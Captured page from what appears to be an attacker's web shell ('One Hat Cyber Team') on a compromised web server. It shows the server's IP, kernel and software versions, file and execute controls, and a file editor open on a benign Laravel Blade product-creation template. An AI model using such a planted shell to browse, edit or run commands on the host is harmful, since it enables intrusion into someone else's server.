⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
wesellnew
/
core
/
resources
/
views
/
back
/
item
/
Edit File: create.blade.php
@extends('master.back') @section('content')
{{ __('Create Product') }}
{{ __('Back') }}
@include('alerts.alerts')
@csrf
{{ __('Name') }} *
{{ __('Slug') }} *
{{ __('Featured Image') }} *
{{ __('Upload Image...') }}
{{ __('Image Size Should Be 800 x 800. or square size') }}
{{ __('Gallery Images') }}
{{ __('Upload Image...') }}
{{ __('Image Size Should Be 800 x 800. or square size') }}
{{ __('Short Description') }} *
{{ old('sort_details') }}
{{ __('Description') }} *
{{ old('details') }}
{{ __('Product Tags') }}
{{ __('Specifications') }}
{{ __('Meta Keywords') }}
{{ __('Meta Description') }}
{{ old('meta_description') }}
{{ __('Save') }}
{{ __('Save & Edit') }}
{{ __('Current Price') }} *
{{ PriceHelper::adminCurrency() }}
{{ __('Previous Price') }}
{{ $curr->sign }}
{{ __('Select Category') }} *
{{__('Select One')}}
@foreach(DB::table('categories')->whereStatus(1)->get() as $cat)
{{ $cat->name }}
@endforeach
{{ __('Select Sub Category') }}
{{__('Select One')}}
{{ __('Select Child Category') }}
{{__('Select One')}}
{{ __('Select Brand') }}
{{__('Select Brand')}}
@foreach(DB::table('brands')->whereStatus(1)->get() as $brand)
{{ $brand->name }}
@endforeach
{{ __('Total in stock') }} *
{{ __('Select Tax') }} *
{{__('Select One')}}
@foreach(DB::table('taxes')->whereStatus(1)->get() as $tax)
{{ $tax->name }}
@endforeach
{{ __('SKU') }} *
{{ __('Video Link') }}
@endsection
Simpan